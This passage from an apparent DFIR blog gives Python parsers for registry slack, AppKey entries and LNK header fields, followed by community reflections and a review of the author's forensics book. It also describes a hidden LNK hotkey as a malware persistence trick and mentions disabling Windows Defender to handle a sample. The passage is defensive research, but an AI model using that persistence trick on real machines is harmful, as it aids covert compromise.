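            size = struct.unpack_from("<i", data, cell)[0]
            if size == 0:
                break
            length = abs(size)
            body = data[cell + 4:cell + length]
            if size < 0:                      # negative size = allocated cell
                used = None
                if body[:2] == b"nk":         # key node: 0x4C fixed bytes + key name
                    used = 0x4C + struct.unpack_from("<H", body, 0x48)[0]
                elif body[:2] == b"vk":       # value record: 0x14 fixed bytes + value name
                    used = 0x14 + struct.unpack_from("<H", body, 0x02)[0]
                if used is not None and used < len(body):
                    slack = body[used:]
                    if slack.strip(b"\x00"):  # ignore pure zero padding
                        print("slack at 0x%08x (%s): %s" % (cell, body[:2].decode(), slack.hex()))
            cell += length
        pos += hbin_size

if __name__ == "__main__":
    cell_slack(sys.argv[1])

Run against a hive file, this just dumps the hex of any non-zero slack bytes; the actual plugin goes further, parsing the recovered data for key and value cells.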
LNK Parsing
While doing some research into LNK 'hotkeys' recently, I ran across Adam's blog post regarding the use of the AppKey subkeys in the Registry. I found this pretty fascinating, even though I do not have media keys on my keyboard, so I wrote a plugin (aptly named "appkeys.pl") to pull this information from the Registry. I also created "appkeys_tln.pl" to extract those subkeys with "ShellExecute" values, and send the info to STDOUT in TLN format.
Adam also pointed out in his post that this isn't something that was entirely theoretical; it's been seen in the wild. As such, something like this takes on even greater significance.
Adam also provided a link to MS's keyboard mappings. By default, the subkey numbered "17" points to a CLSID, which translates to "My Computer".
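If you want to quickly check a live system for the same data (the plugin itself parses an offline Software hive), a short, hypothetical Python sketch along the following lines should do it. The key path is the one described in Adam's post and MS's documentation; the script just enumerates the numbered subkeys and prints any "ShellExecute" values it finds:

import winreg

# Path described in MS's keyboard mapping documentation; appkeys.pl parses the
# same path from an offline Software hive.
APPKEY_PATH = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AppKey"

def list_shellexecute(hive=winreg.HKEY_LOCAL_MACHINE):
    with winreg.OpenKey(hive, APPKEY_PATH) as appkey:
        i = 0
        while True:
            try:
                sub = winreg.EnumKey(appkey, i)
            except OSError:                    # no more subkeys
                break
            i += 1
            with winreg.OpenKey(appkey, sub) as k:
                try:
                    val, _ = winreg.QueryValueEx(k, "ShellExecute")
                    print("AppKey\\%s -> ShellExecute = %s" % (sub, val))
                except FileNotFoundError:      # no ShellExecute value for this subkey
                    pass

if __name__ == "__main__":
    list_shellexecute()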
Fun with Flags
There was a really interesting Twitter thread recently regarding a BSides Perth talk on APT LNK files. During the thread, Nick Carr pointed out that MS had recently updated their LNK format specification documentation, and Silas mentioned the LinkFlags field. I thought, oh, here's a great opportunity to write another blog post, and work in a "The Big Bang Theory" reference. More to the point, however, I thought that by parsing the LinkFlags field, there might be an opportunity to identify toolmarks from whatever tool or process was used to create the LNK file. As such, I set about updating my parser to not only look for the documented flags that are set, but to also check the unused flags. I should also note that Silas recently updated his Python-based LNK parser, as well.
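To show what I mean by checking the unused flags, here's a bare-bones sketch of the idea in Python (separate from my own parser); it pulls the 4-byte LinkFlags field from offset 0x14 of the ShellLinkHeader and reports every bit that is set, calling out the high-order bits (27 through 31) that the specification leaves undefined. Only the first several documented flag names are spelled out; the rest are listed in section 2.1.1 of MS-SHLLINK:

import struct
import sys

DOCUMENTED = {
    0: "HasLinkTargetIDList",
    1: "HasLinkInfo",
    2: "HasName",
    3: "HasRelativePath",
    4: "HasWorkingDir",
    5: "HasArguments",
    6: "HasIconLocation",
    7: "IsUnicode",
    8: "ForceNoLinkInfo",
    9: "HasExpString",
    10: "RunInSeparateProcess",
    # bits 11 through 26 are also defined in the spec; omitted here for brevity
}

def link_flags(path):
    with open(path, "rb") as f:
        header = f.read(0x4C)                     # fixed-size ShellLinkHeader
    flags = struct.unpack_from("<I", header, 0x14)[0]
    print("LinkFlags: 0x%08x" % flags)
    for bit in range(32):
        if not flags & (1 << bit):
            continue
        if bit >= 27:
            name = "UNDEFINED by the spec - possible toolmark"
        else:
            name = DOCUMENTED.get(bit, "(documented flag, see MS-SHLLINK 2.1.1)")
        print("  bit %2d: %s" % (bit, name))

if __name__ == "__main__":
    link_flags(sys.argv[1])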
During a follow-on exchange on Twitter on the topic, @Malwageddon pointed me to this sample, and I downloaded a copy, naming it simply "iris" on my analysis system. I had to disable Windows Defender on my system, as downloading the file, or accessing it in any way (even via one of my tools), caused it to be quarantined.
Doing a Google search for "dikona", I found this ISC handler post, authored by Didier Stevens. Didier's explanation is very thorough.
In order to do some additional testing, I used the VBS code available from Adam's blog post to create a LNK file that includes a "hotkey" field. In Adam's example, he uses a hotkey that isn't covered in the MS documentation, and illustrates that other hotkeys can be used, particularly for malicious purposes. For example, I modified Adam's example LNK file to launch the Calculator when the "Caps Lock" key was hit; it worked like a champ, even when I hit the "Caps Lock" key a second time to turn off the functionality on my keyboard. Now, imagine making that LNK file hidden from view on the Desktop...it does make a very interesting malware persistence method.
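Checking a suspicious LNK file for that sort of hotkey assignment, without ever double-clicking it, is straightforward; the HotKey field is the 2-byte value at offset 0x40 of the header, where the low byte is the virtual-key code and the high byte holds the SHIFT/CTRL/ALT modifier flags. A minimal, hypothetical sketch (only a few key codes are named, just for illustration):

import struct
import sys

MODIFIERS = {0x01: "SHIFT", 0x02: "CTRL", 0x04: "ALT"}
KEYS = {0x14: "CAPS LOCK", 0x90: "NUM LOCK", 0x91: "SCROLL LOCK"}   # partial table

def hotkey(path):
    with open(path, "rb") as f:
        header = f.read(0x4C)
    key, mods = struct.unpack_from("<BB", header, 0x40)    # low byte = key, high byte = modifiers
    if not key:
        print("HotKey: none")
        return
    parts = [name for bit, name in MODIFIERS.items() if mods & bit]
    parts.append(KEYS.get(key, "VK 0x%02x" % key))
    print("HotKey: 0x%02x%02x (%s)" % (mods, key, "+".join(parts)))

if __name__ == "__main__":
    hotkey(sys.argv[1])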
Additional Stuff:
Values associated with the ShowWindow function - the LNK file specification describes a 4-byte ShowCommand value, but includes only 3 values with their descriptions; however, other values can be used, as demonstrated in Adam's post.
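Along the same lines, the ShowCommand field is the 4-byte value at offset 0x3C of the header. The specification names only the three values below and says that everything else is to be treated as SW_SHOWNORMAL, so a value outside that short list is another candidate toolmark. A minimal sketch:

import struct
import sys

SHOW = {0x1: "SW_SHOWNORMAL", 0x3: "SW_SHOWMAXIMIZED", 0x7: "SW_SHOWMINNOACTIVE"}

def show_command(path):
    with open(path, "rb") as f:
        header = f.read(0x4C)
    val = struct.unpack_from("<I", header, 0x3C)[0]
    print("ShowCommand: 0x%x (%s)" % (val, SHOW.get(val, "value not named in the spec")))

if __name__ == "__main__":
    show_command(sys.argv[1])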
Support in the Industry
On 4 July, Alexis tweeted regarding the core reasons that should be behind our motivation for giving back to the community. Yes, I get that this tweet was directed at content producers, as well as those who might be thinking about producing content. His statement about the community not owing us engagement or feedback is absolutely correct, however disheartening I might have found that statement, and the realization, to be. But like I said, he's right. So, if you're going to share something, first look at why you're sharing. If you're doing it to get feedback (like I very often do...), then you have to accept that you're likely not going to get it. If you're okay with that, cool...fire away. This is something I've had to come to grips with, and doing so has changed the way (and what) I share. I think that it also influences how others share, as well. What I mean is, why put in the effort of a thorough write-up in a blog post or an article, and publish it somewhere, when it's so much easier to just put it into a tweet (or two, or twelve...)? In fact, by tweeting it, you'll likely get much more feedback (in likes and RTs) than you would otherwise, even though stuff tweeted has a lifespan comparable to that of a fruit fly.
More recently, Alexis shared this blog post. I thought that this was a very interesting perspective to take, given that when I've engaged with others specifically about just offering a "thank you", I've gotten back some pretty extreme, absolutist comments in return. For example, when I suggested that if someone shares a program or script that you find useful, one should say, "thank you", one tweeter responded that he's not going to say "thank you" every time he uses the script. That's a little extreme, not what I intended, and not what I was suggesting at all. But I do support Alexis' statement; if you find value in something that someone else put out there, express your gratitude in some manner. Say "thank you", write a review of the tool, comment on the blog post, whatever. While the imposter syndrome appears to be something that an individual needs to deal with, I think as a community, we can all help others overcome their own imposter syndrome by providing some sort of feedback.
As a side note, the imposter syndrome is not something isolated to the DFIR community...not at all. I've talked to a number of folks in other communities (threat intel, etc.) who have expressed realization of their own imposter syndrome.
Alexis also shared some additional means by which the community can support efforts in the field, and one that comes to mind is the request made by the good folks at Arsenal Recon. Their image mounter, called "AIM", provides a great capability, one that they're willing to improve with support from the community.
Sunday, September 23, 2018
First Review of IWS
The first written review of IWS comes from Joey Victorino, a consultant with the IBM X-Force IRIS team. Joey sent me his review via LinkedIn, and graciously allowed me to post it here. Here are Joey's thoughts on the book, in his own words:
I've been a fan of Harlan Carvey ever since his first release of Windows Forensic Analysis, 2nd Edition book years ago when I first entered the digital forensics environment. Initially, I had reservations that the new book "Investigating Windows Systems" would be a bit simplistic as I've read quite a bit of forensics books and attended multiple SANS Courses. However, I was wrong, and I really enjoyed this book - especially because Harlan Carvey is an awesome analyst. Essentially, it looks into different scenarios a DFIR professional will encounter throughout their career, by unpacking these scenarios through the eyes of a professional analyst. After the initial evidence is triaged it is then broken down into a conversation about the scenario, with clear examples of what the artifacts are like in this stage of the investigation and then provides practical examples in identifying actionable data and leveraging that as a pivot point to uncover more data. Because of the spread of knowledge, I found it very interesting and very useful to cover off areas where I was a bit unfamiliar with the subject matter. My favorite was "Chapter 4" as it went into Ali Hadi’s “Web Server Case” in a fantastic manner. I've been using this challenge as a method to train junior analysts and another IT professional moving into the DFIR field. His approach to solving the exercise was a great example, of being a consultant performing on-site DFIR with a focus on getting the answers needed quickly, and in a proper manner to be able to allow clients to make important business decisions. Overall, the greatest message learned from this book is that even though there are many different tools, the most effective skill a forensic analyst can have is being able to investigate properly, by analyzing the correct data, and using it to clearly answer the important questions. This would be an excellent book to not only have on the shelf but read and actively reference for DFIR practitioners of all experience levels. Joey Victorino – Consultant IBM X-Force IRIS
Thanks, Joey, for your kind words, and thanks for taking the time to share your thoughts on the book. Most importantly, thank you for purchasing and reading my book! My hope is that others find similar interest and value in what I've written.
Addendum, 26 Sept: Mary Ellen posted a review, as well!
Tuesday, September 18, 2018
Book Writing
With the release of my latest book, Investigating Windows Systems, I thought that now would be a good time to revisit the topic of writing books. It occurred to me, watching some of the activity and comments on social media, that there were likely folks who hadn't seen my previous posts on this topic, let alone the early material I'd posted about the book, particularly what I'd written about it two years ago.
As I said, I've blogged on the topic of writing (DFIR) books before:
17 Dec 2010
26 Dec 2010
28 Mar 2014
29 Mar 2014
16 Feb 2018
There are some things about writing books that many folks out there simply may not be aware of, particularly if they haven't written a book themselves. One such item, for example, is that the author doesn't own the books. I had a sales guy set up an event that he wanted me to attend, and he suggested that I "bring some books to sell". I don't own the books to sell, and as far as I'm aware, I'm not PCI compliant; I don't process credit cards.
Further, authors have little, if any, control over...well, anything beyond the content, unless they're self-published. For example, I'm fully aware that as of 17 Sept 2018, the image on the Amazon page for IWS is still the placeholder that was likely used when the page was originally set up. I did reach out to the publisher about this, and they let me know that this is an issue that they've had with the vendor, not just with my book but with many others, as well. While I can, and do, market the books to the extent that I can, I have no control over, nor any input into, what marketing the publisher does, if any. Nor do authors have any input or control over what the publisher's vendors do, or don't do, as the case may be.
Addendum, 19 Sept: I checked again today, and the Amazon page for the book has been updated with the proper book cover image.
Taking a quick look through a copy of the Investigating Windows Systems book, I noted a few things that jumped out at me. I did see a misspelled word or two, read a sentence here and there that seemed awkward and required a re-read (and maybe a re-write), and noticed an image or two that could have been bigger and more visible. Would the book have looked a bit better if it had a bit bigger form factor? Perhaps. Then it would have been thinner. However, my point is that I didn't have any input into that aspect of the book.
I'm also aware that several pages (pp. 1, 45, 73, 97) have something unusual at the bottom of the page. Specifically, "Investigating Windows Systems. DOI: https://doi.org/10.1016/{random}", and then immediately below that, a copyright notice. Yes, this does stand out like a sore thumb, and no, I have no idea why it's there.
If you purchased or received a copy of the book, I hope you find value in it. As I've said before, I wanted to take a different approach with this book, and produce something new and I hope, useful.